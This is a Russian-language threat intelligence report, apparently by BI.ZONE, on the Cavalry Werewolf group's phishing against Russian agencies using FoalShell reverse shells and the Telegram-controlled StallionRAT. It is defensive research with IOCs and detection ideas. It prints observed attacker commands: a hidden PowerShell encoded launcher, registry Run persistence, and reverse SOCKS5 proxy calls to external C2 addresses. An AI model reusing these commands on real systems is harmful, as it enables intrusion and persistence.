Cavalry Werewolf атакует Россию через доверительные отношения между государствами
Специалисты BI.ZONE Threat Intelligence зафиксировали активность кластера Cavalry Werewolf
Чтобы получить первоначальный доступ, злоумышленники запускали целенаправленные фишинговые рассылки, маскируя их под официальные письма госслужащих Кыргызстана. Основные цели атак — российские государственные учреждения, а также компании в сфере энергетики, добычи полезных ископаемых и обрабатывающей промышленности.
В выявленной активности Cavalry Werewolf полагался на вредоносные программы собственной разработки: реверс-шеллы FoalShell и трояны удаленного доступа StallionRAT с управлением через Telegram.
- Cavalry Werewolf активно экспериментирует с наполнением арсенала. Это подчеркивает, как важно оперативно получать информацию об инструментах кластера — без этого невозможно поддерживать актуальные меры по предотвращению и обнаружению подобных атак.
- Злоумышленники могут не только выдавать себя за официальных лиц, но и действительно компрометировать их почтовые ящики для фишинга. Поэтому важно внимательно проверять не только отправителя, но и содержание письма: текст, ссылки и вложения.
- То, что атаки кластера не освещают публично, не значит, что их нет. Порталы киберразведки позволяют оперативно получать актуальную информацию о ландшафте киберугроз в регионе и эффективно расставлять приоритеты в защите.
Cavalry Werewolf в целевых фишинговых рассылках на российские организации использует якобы почтовые адреса сотрудников различных ведомств Кыргызской Республики, например:
- Министерства экономики;
- Министерства культуры, информации и молодежной политики;
- Министерства транспорта и коммуникаций.
В качестве вложения в фишинговых письмах использовался RAR‑архив, содержащий вредоносное программное обеспечение FoalShell либо StallionRAT.
В одной из фишинговых рассылок атакующие использовали реальный почтовый адрес, который встречается на сайте регулятора Кыргызской Республики. Вероятно, злоумышленники скомпрометировали данный адрес ранее для использования в атаках.
Идея для гипотезы
%LocalAppData%\Microsoft\Windows\INetCache\Content.Outlook.
FoalShell — простые реверс-шеллы, написанные на языках Go, C++, C#, применяемые Cavalry Werewolf. FoalShell позволяют атакующим выполнять произвольные команды в интерпретаторе командной строки cmd.exe на скомпрометированном хосте.
FoalShell C#
Исходный код .NET‑приложения отличается простотой: по сути, это обычный reverse shell, который работает через cmd с перенаправлением потоков ввода и вывода. В результате злоумышленник получает доступ к командной строке на удаленном устройстве жертвы и может выполнять любые команды. При этом окно cmd.exe запускается в скрытом режиме. Если возникают ошибки ввода-вывода или сбои в работе сокетов, приложение автоматически прекращает выполнение.
Известные имена файлов:
О результатах трёх месяцев совместной работы [redacted].exeСписок сотрудников выдвинутых к премии ко Дню России.exe.exeПриказ о поощрении сотрудников ко дню России (Т‑11а) № 1 от 30.05.2025.exeО ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exeО работе почтового сервера план и проведенная работа.exeО проведении личного приема граждан список участников.exeСлужбеная записка от 16.06.2025___________________________.exe
Обнаруженные PDB‑пути:
C:\Users\yaadzrr\Documents\reverseShells\Reverse-Shell-CS\Payload\Real_cli\obj\Release\Docu_rsnet.pdbC:\Users\yueying\Documents\reverseShells\Reverse-Shell-CS\Payload\Real_cli\obj\Release\NetChecker.pdb
Благодаря идентификатору сборки 8923c4d9-3fbf-4cf3-8a63-c5102293b774, названию пространства имен и структуре кода удалось обнаружить GitHub-репозиторий
FoalShell Cpp
В этом варианте злоумышленники использовали лаунчер на C++, содержащий шелл‑код и обфусцированный реверс-шелл FoalShell в ресурсе под именем output_bin. При запуске ресурс считывается, для него с помощью WinAPI‑функции VirtualAlloc с правами RWE выделяется область памяти. После этого содержимое ресурса копируется в выделенную память и происходит выполнение шелл‑кода, который деобфусцирует основной код реверс-шелла и передает ему управление с помощью WinAPI‑функции ZwResumeThread.
Известные имена файлов:
О работе почтового сервера план и проведенная работа.exeПрограммный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exeПлан-протокол встречи о сотрудничестве представителей должн.лиц.exeАппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exeИнформация по письму в МИД от 6 июля статус и прилагаемые документы.exeО проведении личного приема граждан список участников план и проведенная работа.exe
PDB‑путь:
C:\Users\Professional\Source\Repos\bin_loader\x64\Release\bin_loader.pdb
output_bin с нагрузкой в виде реверс‑шелла FoalShell Cpp
Основной код реверс-шелла использует сетевые сокеты, запускает в скрытом режиме cmd.exe и перенаправляет потоки ввода-вывода в консоль, что позволяет злоумышленнику выполнять произвольные команды на удаленном хосте жертвы.
FoalShell Go
Данный вариант реверс-шелла, реализованного на Go, устанавливает соединение с удаленным сервером управления и предоставляет злоумышленнику скрытый доступ к командной строке компьютера жертвы.
Известные имена файлов:
Служебная записка от 20.08.2025[множество пробелов].exeСлужебная записка от 12.08.2025[множество пробелов].exeАппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe
Путь к проекту:
C:\source\repos\ggg
Идея для гипотезы
cmd.exe, который запускается подозрительным родительским процессом. Это могут быть:
- процессы, находящиеся в типовых для злоумышленников папках:
%Temp%%LocalAppData%%AppData%\RoamingC:\Users\Public%UserProfile%\Downloads\%UserProfile%\Desktop
- родительские процессы с небольшим временем существования на хосте;
- процессы с именами, мимикрирующими под названия документов.
StallionRAT — трояны удаленного доступа, написанные на языках Go, PowerShell, Python, используемые Cavalry Werewolf. StallionRAT позволяют атакующим выполнять произвольные команды, загружать дополнительные файлы и производить эксфильтрацию собранных данных. В качестве командного сервера используется телеграм‑бот.
Известные имена файлов:
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe
Обнаруженный PDB-путь:
C:\Users\Admin\source\repos\ConsoleApplication3\x64\Release\ConsoleApplication3.pdb
В данной кампании атакующие использовали лаунчер, написанный на C++, для запуска экземпляра вредоносной программы StallionRAT на PowerShell. Лаунчер осуществляет запуск PowerShell с командой, закодированной Base64. Формат аргументов командной строки:
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand JABjAGgAYQB0AF8AaQBkACAAPQAgACIANwA3ADAAOQAyADIAOAAyADgANQAiAA0ACgAkA...
Выполнение указанной PowerShell-команды приводит к запуску StallionRAT, управляемого через Telegram.
Идея для детекта
powershell.exe с параметром -EncodedCommand, поскольку злоумышленники часто используют Base64-кодировку для обхода механизмов защиты и правил корреляции. Также активность может быть характерна для работы администраторов, но такие действия можно исключить из правила корреляции.
Идея для гипотезы
powershell.exe с параметрами -WindowStyle Hidden и -ExecutionPolicy Bypass. Такими параметрами могут пользоваться злоумышленники для скрытого запуска кода и обхода механизмов защиты. Однако, в отличие от детекта выше, такие команды использует и множество легитимного ПО, которое регулярно фильтровать достаточно проблематично.
Во время инициализации StallionRAT осуществляется присвоение идентификатора DeviceID скомпрометированному хосту. DeviceID — это случайное число от 100 до 10 000. Также данная вредоносная программа получает имя компьютера с помощью $env:COMPUTERNAME.
В вечном цикле (while True) постоянно вызывается функция getUpdates для получения новых команд и сообщений телеграм-бота. Результаты выполнения команд и сообщения об ошибках отправляются в определенный телеграм-чат, заданный в коде StallionRAT.
Команды RAT:
/list— получает список скомпрометированных хостов, подключенных к данному C2. Возвращает список, содержащийDeviceIDи имя компьютера;/go [DeviceID] [команда]— выполняет заданную команду с помощьюInvoke-Expression;/upload [DeviceID]— загружает файл на устройство жертвы с помощьюDownload-TelegramFileи сохраняет его по путиC:\Users\Public\Libraries\%fileName%.
После изучения дополнительной информации были обнаружены команды, выполняемые StallionRAT на одном из скомпрометированных хостов с идентификатором 9139. Они свидетельствуют о том, что данный RAT был доставлен в каталог C:\Users\Public\Libraries и добавлен в автозагрузку через ключ реестра Run:
'win.exe' successfully uploaded >> C:\Users\Public\Libraries\win.exe. /go9139 REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WinRVN /t REG_SZ /d C:\users\public\libraries\win.exe /f
Также были выявлены следующие команды, свидетельствующие об использовании инструментов проксирования SOCKS5 — ReverseSocks5Agent и ReverseSocks5
/go9139 C:\users\public\libraries\rev.exe -pcl 96.9.125[.]168:443 /go9139 C:\users\public\libraries\rev.exe -pcl 78.128.112[.]209:10443 /go9139 C:\users\public\libraries\revv2.exe -connect 96.9.125[.]168:443 /go9139 C:\users\public\libraries\revv2.exe -connect 78.128.112[.]209:10443
Кроме того, выполнялись команды для сбора информации о скомпрометированном хосте:
/go9139 ipconfig /all /go9139 netstat /go9139 whoami /go9139 ls C:\users\public\libraries /go9139 ping 10.70.70.10 /go9139 net user /dom
Идеи для гипотез
- поиск и анализ событий создания файлов в папке
C:\Users\Public\Libraries\, а также событий запуска процессов из этой же папки; - поиск событий закрепления подозрительных файлов в ветке реестра
\Software\Microsoft\Windows\CurrentVersion\Runчерез утилиту работы с реестромreg.exeи командуaddлибо через функциональность отслеживания изменений реестра, которые предлагают в том числе EDR‑решения; - поиск событий изучения окружения с помощью таких команд, как
whoami,netstat,ipconfig, запускаемых подозрительными родительскими процессами и пользователями, которые ранее такие команды не использовали.
В ходе исследования удалось изучить дополнительную информацию, связанную с подготовкой к атакам Cavalry Werewolf и тестированием вредоносных программ.
В первом случае зафиксированы файлы, указывающие на подготовку атаки против российских компаний, а также файл на таджикском языке C:\Users\Admin\Desktop\Номерхои коргархо new.rar, что может свидетельствовать о нацеливании злоумышленников и на Таджикистан.
Кроме того, есть основания полагать, что, помимо выявленного нами ВПО, злоумышленники могли использовать и другие инструменты, например AsyncRAT. На это указывает путь: C:\Users\Admin\Desktop\Async Rust RAT_0.1.0_x64_en-US.msi.
Во втором случае, помимо файлов с названиями на английском языке, обнаружены файлы с арабскими именами. Это указывает на то, что злоумышленники могут нацеливаться на страны Ближнего Востока. Таким образом, география их атак оказывается весьма широкой и не ограничивается Россией, другими странами СНГ и иными регионами, затронутыми зафиксированной нами вредоносной активностью Cavalry Werewolf.
27a11c59072a6c2f57147724e04c7d6884b52921da2629fb0807e0bb93901cbc3cd7f621052919e937d9a2fdd4827fc7f82c0319379c46d4f9b9dd5861369ffcc3df16cce916f1855476a2d1c4f0946fa62c2021d1016da1dc524f4389a3b6fae15f1a6d24b833ab05128b4b34495ef1471bd616b9833815e2e98b8d3ae78ff2dae3c08fa3df76f54b6bae837d5abdc309a24007e9e6132a940721045e65d2bb8404f8294b14d61ff712b60e92b7310e50816c24b38a00fcc3da1371a33671038e6d7c44ab66f37bf24351323dc5e8d913173425b14750a50a2cbea6d9e439bafa6cdd1873fba54764c52c64eadca49d52e5b79740364ef16e5d86d61538878d0e7b65930bc73636f2f99b05a3bb0af9aaf17d3790d0107eb06992d25e62f59dc9ffbe942a0b0182e0cd9178ac4fbf8334cae48607748d978abf47bd3510405104769b75d7fb42fbbce39d4c4b0e9f83b60cc330efa477927e68b9bdba279bb87da82e14fb483a680a623b0ef69bcfbd9aaaedf3ec26f4c34922d6923159f52f
c26b62fa593d6e713f1f2ccd987ef09fe8a3e691c40eb1c3f19dd57f896d9f591dfe65e8dc80c59000d92457ff7053c07f272571a8920dbe8fc5c2e7037a6c98a8ada7532ace3d72e98d1e3c3e02d1bd1538a4c5e78ce64b2fe1562047ba4e52cc9e5d8f0b30c0aaeb427b1511004e0e4e89416d8416478144d76aa1777d1554ec80e96e3d15a215d59d1095134e7131114f669ebc406c6ea1a709003d3f6f178e7fb9f6acfb9b08fb424ff5772c46011a92d80191e7736010380443a46e695cb13b83b515ce60a61c721afd0aeb7d5027e3671494d6944b34b83a5ab1e2d9f4af3d740c5b09c9a6237d5d54d78b5227cdaf60be89f48284b3386a3aadeb02834f17a7f8d2cec5c2206c3cba92967b4b499f0d223748d3b34f9ec4981461d28822ba8c24f1aefc864490f70f503f709d2d980b9bc18fece4187152a1d9ca5fab148a42ccaa97c2e2352dbb207f07932141d5290d4c3b57f61a780f9168783eda7084f06f2d8613dfe418b242c43060ae578e7166ce5aeed2904a8327cd98dbdfab0ad77a341b12cfc719d10e0fc45a6613f41b2b3f6ea963ee6572cf02b41f4d6b290953441b1c53f63f98863aae75bd8ea32996ab07976e498bad111d535252
cc84bfdb6e996b67d8bc812cf08674e8eca6906b53c98df195ed99ac5ec14a06
fbf1bae3c576a6fcfa86db7c36a06c2530423d487441ad2c684cfeda5cd19685
a3ec2992e6416a3af54b3aca3417cf4a109866a07df7b5ec0ace7bd1bf73f3c6
188.127.225[.]191:44394.198.52[.]200:44391.219.148[.]93:443185.244.180[.]169:443109.172.85[.]95:443185.231.155[.]111:443185.173.37[.]67:443188.127.227[.]226:44362.113.114[.]209:44396.9.125[.]168:44378.128.112[.]209:10443
| Тактика | Техника | Процедура |
|---|---|---|
| Initial Access |
Phishing: Spearphishing Attachment |
Cavalry Werewolf использует вложения в фишинговые электронные письма для распространения ВПО |
| Execution |
Command and Scripting Interpreter: PowerShell |
Cavalry Werewolf использует лаунчер на C++ для запуска PowerShell с закодированной Base64‑командой, содержащей код вредоносной программы StallionRAT |
|
Command and Scripting Interpreter: Windows Command Shell |
Cavalry Werewolf использует реверс‑шеллы FoalShell для удаленного выполнения команд в интерпретаторе |
|
|
User Execution: Malicious File |
Жертва должна распаковать вредоносный RAR‑архив и запустить исполняемый файл, чтобы инициировать процесс компрометации системы |
|
| Persistence |
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Cavalry Werewolf добавляет StallionRAT в ключ реестра Run:
|
| Defense Evasion |
Deobfuscate/Decode Files or Information |
Cavalry Werewolf использует шелл‑код из ресурса |
|
Hide Artifacts: Hidden Window |
Cavalry Werewolf использует в реверс‑шеллах FoalShell невидимое окно, чтобы скрыть активность, выполняемую в пользовательском интерфейсе |
|
|
Masquerading: Space after Filename |
Cavalry Werewolf использует множество пробелов или символ
|
|
|
Obfuscated Files or Information: Embedded Payloads |
Cavalry Werewolf хранит вредоносную нагрузку в секции ресурсов лаунчера на C++ |
|
|
Obfuscated Files or Information: Encrypted/Encoded File |
Cavalry Werewolf кодирует PowerShell‑код StallionRAT с помощью Base64 |
|
| Discovery |
Account Discovery: Domain Account |
Cavalry Werewolf использует команду |
|
File and Directory Discovery |
Cavalry Werewolf использует команду |
|
|
System Information Discovery |
Cavalry Werewolf использует StallionRAT для получения имени компьютера жертвы |
|
|
System Network Configuration Discovery |
Cavalry Werewolf использует команды |
|
|
System Network Configuration Discovery: Internet Connection Discovery |
Cavalry Werewolf использует команду |
|
|
System Owner/User Discovery |
Cavalry Werewolf использует команду |
|
| Command and Control |
Application Layer Protocol: Web Protocols |
Cavalry Werewolf использует в StallionRAT HTTPS для коммуникации с |
|
Ingress Tool Transfer |
Cavalry Werewolf использует StallionRAT для загрузки файлов на компьютер жертвы |
|
|
Non‑Application Layer Protocol |
Cavalry Werewolf использует сокеты в реверс‑шеллах FoalShell для коммуникации с управляющим сервером |
|
|
Proxy |
Cavalry Werewolf использует инструменты проксирования SOCKS5 — ReverseSocks5Agent и ReverseSocks5 |
|
|
Web Service: Bidirectional Communication |
Cavalry Werewolf использует Telegram Bot API в StallionRAT для отправки и получения сообщений |
|
| Exfiltration |
Exfiltration Over Web Service |
Cavalry Werewolf использует Telegram для отправки информации о компьютере жертвы |
Рассматриваемая вредоносная активность обнаруживается следующими правилами BI.ZONE TDR:
win_suspicious_powershell_encoded_commandgen_ti_wolfs_network_ioc_was_detectedgen_ti_wolfs_hash_was_detectedwin_discovery_owner_and_users_systemwin_discovery_system_network_configurationwin_discovery_network_connectionswin_th_start_hidden_powershell
Фишинг занимает первое место среди векторов атак: злоумышленники рассчитывают на невнимательность получателя и распространяют ВПО через электронную почту.
Для защиты почты полезны специализированные сервисы, фильтрующие нежелательные письма. Одно из таких решений — BI.ZONE Mail Security. Сразу после установки включаются более 100 механизмов защиты от спама, фишинга, спуфинга, уязвимостей почтовых серверов и атак с вредоносным ПО. Для фильтрации используются статистический, сигнатурный, лингвистический, контентный, эвристический анализ, машинное зрение. ML‑модель точно классифицирует письма по содержанию и управляет их рейтингами. В результате нелегитимные письма блокируются, а безопасные доставляются без задержек.
Чтобы выстроить эффективную киберзащиту, важно понимать, какие угрозы актуальны именно для вашей организации. Здесь помогает BI.ZONE Threat Intelligence. Портал предоставляет подробную информацию об актуальных атаках, злоумышленниках, их тактиках, техниках, инструментах, а также сведения с теневых ресурсов. Эти данные помогают проактивно защищать компанию и быстро реагировать на киберинциденты.
